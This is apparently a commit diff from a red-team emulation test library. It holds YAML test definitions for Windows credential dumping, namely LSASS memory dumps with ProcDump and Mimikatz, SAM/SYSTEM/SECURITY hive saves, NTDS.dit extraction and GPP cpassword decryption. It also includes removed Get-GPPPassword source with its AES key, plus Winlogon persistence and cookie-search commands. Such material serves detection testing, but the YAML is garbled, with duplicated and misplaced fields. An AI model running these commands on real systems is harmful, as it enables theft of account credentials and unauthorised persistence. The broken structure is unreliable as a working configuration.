description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
wce -o #{output_file}
executor:
name: command_prompt
elevation_required: true
command: |
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
cleanup_command: |
rm %temp%\sam
rm %temp%\system
rm %temp%\security
- name: Registry dump of SAM, creds, and secrets
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\procdump.exe
input_arguments:
output_folder:
description: Output folder path
type: Path
default: C:\Windows\Temp
executor:
name: command_prompt
elevation_required: true
command: |
reg save HKLM\sam "#{output_folder}\sam"
reg save HKLM\system "#{output_folder}\system"
reg save HKLM\security "#{output_folder}\security"
cleanup_command: |
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {0} else {1}
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
executor:
elevation_required: true
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
supported_platforms:
- windows
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
input_arguments:
procdump_binary_path:
description: Path of the ProcDump binary
type: string
default: $PathToAtomicsFolder\T1003\bin\procdump64.exe
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
executor:
elevation_required: true
name: command_prompt
command: |
#{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
rm "#{output_file}"
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: manual
steps: |
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
supported_platforms:
- windows
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
executor:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
input_arguments:
mimikatz_binary_path:
description: Path of the Mimikatz binary
type: string
default: $PathToAtomicsFolder\T1003\bin\mimikatz.exe
input_file:
description: Path of the Lsass dump
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
- name: Create Volume Shadow Copy with NTDS.dit
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
#{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: "C:"
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
vssadmin.exe create shadow /for=#{drive_letter}
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp
- name: Copy NTDS.dit from Volume Shadow Copy
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
executor:
name: command_prompt
elevation_required: true
command: |
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
- name: Create Volume Shadow Copy with NTDS.dit
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
default: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
extract_path:
description: Path for extracted NTDS.dit
type: Path
default: C:\Windows\Temp
supported_platforms:
- windows
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
- description: |
Volume shadow copy must exist
prereq_command: |
if not exist #{vsc_name} (exit /b 1)
get_prereq_command: |
echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
- description: |
Extract path must exist
prereq_command: |
if not exist #{extract_path} (exit /b 1)
get_prereq_command: |
mkdir #{extract_path}
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: "C:"
executor:
name: command_prompt
elevation_required: true
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
cleanup_command: |
rm "#{extract_path}\ntds.dit"
rm "#{extract_path}\VSC_SYSTEM_HIVE"
rm "#{extract_path}\SYSTEM_HIVE"
executor:
name: command_prompt
elevation_required: true
command: |
vssadmin.exe create shadow /for=#{drive_letter}
- name: GPP Passwords (findstr)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
- name: Copy NTDS.dit from Volume Shadow Copy
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
dependency_executor_name: powershell
dependencies:
- description: |
Computer must be domain joined
prereq_command: |
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
get_prereq_command: |
Write-Host Joining this computer to a domain must be done manually
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
findstr /S cpassword %logonserver%\sysvol\*.xml
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
default: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
extract_path:
description: Path for extracted NTDS.dit
type: Path
default: C:\Windows\Temp
- name: GPP Passwords (Get-GPPPassword)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
executor:
name: command_prompt
elevation_required: true
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
cleanup_command: |
rm "#{extract_path}\ntds.dit"
rm "#{extract_path}\VSC_SYSTEM_HIVE"
rm "#{extract_path}\SYSTEM_HIVE"
supported_platforms:
- windows
- name: GPP Passwords (findstr)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
input_arguments:
gpp_script_path:
description: Path to the Get-GPPPassword PowerShell Script
type: Path
default: PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
gpp_script_url:
description: URL of the Get-GPPPassword PowerShell Script
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
prereq_command: |
if(Test-Path "#{gpp_script_path}") { 0 } else { 1 }
get_prereq_command: |
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
- description: |
Computer must be domain joined
prereq_command: |
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
get_prereq_command: |
Write-Host Joining this computer to a domain must be done manually
executor:
name: command_prompt
elevation_required: false
command: |
findstr /S cpassword %logonserver%\sysvol\*.xml
executor:
name: powershell
elevation_required: false
command: |
. #{gpp_script_path}
Get-GPPPassword -Verbose
- name: GPP Passwords (Get-GPPPassword)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
- name: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
description: |
This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
supported_platforms:
- windows
supported_platforms:
- windows
input_arguments:
gpp_script_path:
description: Path to the Get-GPPPassword PowerShell Script
type: Path
default: $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
input_arguments:
ninjacopy_script_path:
description: Path to the Invoke-NinjaCopy PowerShell script
type: Path
default: PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
ninjacopy_script_url:
description: URL of the Invoke-NinjaCopy PowerShell Script
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/6b0ada999a9d2be8c6c9267da57b898494d13219/Exfiltration/Invoke-NinjaCopy.ps1
output_folder:
description: Output folder path
type: Path
default: C:\Windows\Temp
executor:
name: powershell
elevation_required: false
command: |
. #{gpp_script_path}
Get-GPPPassword -Verbose
dependency_executor_name: powershell
dependencies:
- description: |
Invoke-NinjaCopy PowerShell Script must exist at #{ninjacopy_script_path}
prereq_command: |
if(Test-Path "#{ninjacopy_script_path}") { 0 } else { 1 }
get_prereq_command: |
New-Item -ItemType Directory (Split-Path "#{ninjacopy_script_path}") -Force | Out-Null
Invoke-WebRequest #{ninjacopy_script_url} -OutFile "#{ninjacopy_script_path}"
- name: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
description: |
This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
supported_platforms:
- windows
input_arguments:
sam_binary_path:
description: Path of the SAM file
type: string
default: C:\Windows\System32\config\sam
system_binary_path:
description: Path of the SYSTEM file
type: string
default: C:\Windows\System32\config\system
security_binary_path:
description: Path of the SECURITY file
type: string
default: C:\Windows\System32\config\security
output_folder:
description: Output folder path
type: Path
default: C:\Windows\Temp
executor:
name: powershell
elevation_required: true
command: |
. $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
cleanup_command: |
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"
executor:
name: powershell
elevation_required: true
command: |
. #{ninjacopy_script_path}
Invoke-NinjaCopy -Path "%systemroot%\System32\sam" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "%systemroot%\System32\system" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "%systemroot%\System32\security" -LocalDestination "#{output_folder}\security"
cleanup_command: |
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"
atomics/T1003/src/Get-GPPPassword.ps1
-248
View File
@@ -1,248 +0,0 @@
function Get-GPPPassword {
<#
.SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
.PARAMETER Server
Specify the domain controller to search for.
Default's to the users current domain
.EXAMPLE
PS C:\> Get-GPPPassword
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
NewName : [BLANK]
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
NewName : [BLANK]
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
.EXAMPLE
PS C:\> Get-GPPPassword -Server EXAMPLE.COM
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
.EXAMPLE
PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!
.LINK
http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
#>
[CmdletBinding()]
Param (
[ValidateNotNullOrEmpty()]
[String]
$Server = $Env:USERDNSDOMAIN
)
#Some XML issues between versions
Set-StrictMode -Version 2
#define helper function that decodes and decrypts password
function Get-DecryptedCpassword {
[CmdletBinding()]
Param (
[string] $Cpassword
)
try {
#Append appropriate padding based on string length
$Mod = ($Cpassword.length % 4)
switch ($Mod) {
'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
'2' {$Cpassword += ('=' * (4 - $Mod))}
'3' {$Cpassword += ('=' * (4 - $Mod))}
}
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
#Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
}
catch {Write-Error $Error[0]}
}
#define helper function to parse fields from xml files
function Get-GPPInnerFields {
[CmdletBinding()]
Param (
$File
)
try {
$Filename = Split-Path $File -Leaf
[xml] $Xml = Get-Content ($File)
#declare empty arrays
$Cpassword = @()
$UserName = @()
$NewName = @()
$Changed = @()
$Password = @()
#check for password field
if ($Xml.innerxml -like "*cpassword*"){
Write-Verbose "Potential password in $File"
switch ($Filename) {
'Groups.xml' {
$Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Services.xml' {
$Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Scheduledtasks.xml' {
$Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'DataSources.xml' {
$Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Printers.xml' {
$Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Drives.xml' {
$Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
}
}
foreach ($Pass in $Cpassword) {
Write-Verbose "Decrypting $Pass"
$DecryptedPassword = Get-DecryptedCpassword $Pass
Write-Verbose "Decrypted a password of $DecryptedPassword"
#append any new passwords to array
$Password += , $DecryptedPassword
}
#put [BLANK] in variables
if (!($Password)) {$Password = '[BLANK]'}
if (!($UserName)) {$UserName = '[BLANK]'}
if (!($Changed)) {$Changed = '[BLANK]'}
if (!($NewName)) {$NewName = '[BLANK]'}
#Create custom object to output results
$ObjectProperties = @{'Passwords' = $Password;
'UserNames' = $UserName;
'Changed' = $Changed;
'NewName' = $NewName;
'File' = $File}
$ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
Write-Verbose "The password is between {} and may be more than one value."
if ($ResultsObject) {Return $ResultsObject}
}
catch {Write-Error $Error[0]}
}
try {
#ensure that machine is domain joined and script is running as a domain account
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
throw 'Machine is not a domain member or User is not a member of the domain.'
}
#discover potential files containing passwords ; not complaining in case of denied access to a directory
Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
$XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include *.xml
if ( -not $XMlFiles ) {throw 'No preference files found.'}
Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
foreach ($File in $XMLFiles) {
$Result = (Get-GppInnerFields $File.Fullname)
Write-Output $Result
}
}
catch { Write-Error $_ }
}
atomics/T1003/src/Invoke-NinjaCopy.ps1
-2834
View File
File diff suppressed because one or more lines are too long
atomics/T1004/T1004.md
+18 -6
View File
@@ -27,18 +27,22 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
@@ -48,18 +52,22 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
@@ -69,12 +77,13 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
@@ -82,4 +91,7 @@ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\No
<br/>
atomics/T1005/T1005.md
+6 -2
View File
@@ -18,12 +18,13 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_string | String to search Safari cookies to find. | string | coinbase|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
@@ -31,4 +32,7 @@ grep -q "#{search_string}" "Cookies.binarycookies"
<br/>
atomics/T1006/T1006.md
+7 -3
View File
@@ -18,7 +18,7 @@ Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam|
@@ -26,7 +26,8 @@ Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master
| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security|
| output_folder | Output folder path | Path | C:\Windows\Temp|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
. $PathToAtomicsFolder\T1006\src\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
@@ -34,7 +35,6 @@ Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folde
Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
```
#### Cleanup Commands:
```
rm "#{output_folder}\sam"
@@ -42,4 +42,8 @@ rm "#{output_folder}\system"
rm "#{output_folder}\security"
```
<br/>
atomics/T1007/T1007.md
+11 -3
View File
@@ -17,7 +17,8 @@ Identify system services
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
tasklist.exe
sc query
@@ -26,6 +27,9 @@ sc query state= all
<br/>
<br/>
@@ -35,16 +39,20 @@ Enumerates started system services using net.exe and writes them to a file. This
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net.exe start >> #{output_file}
```
<br/>
atomics/T1009/T1009.md
+6 -2
View File
@@ -18,16 +18,20 @@ Uses dd to add a zero to the binary to change the hash
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
<br/>
atomics/T1010/T1010.md
+6 -2
View File
@@ -17,13 +17,14 @@ Compiles and executes C# code to list main window titles associated with each pr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | T1010.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
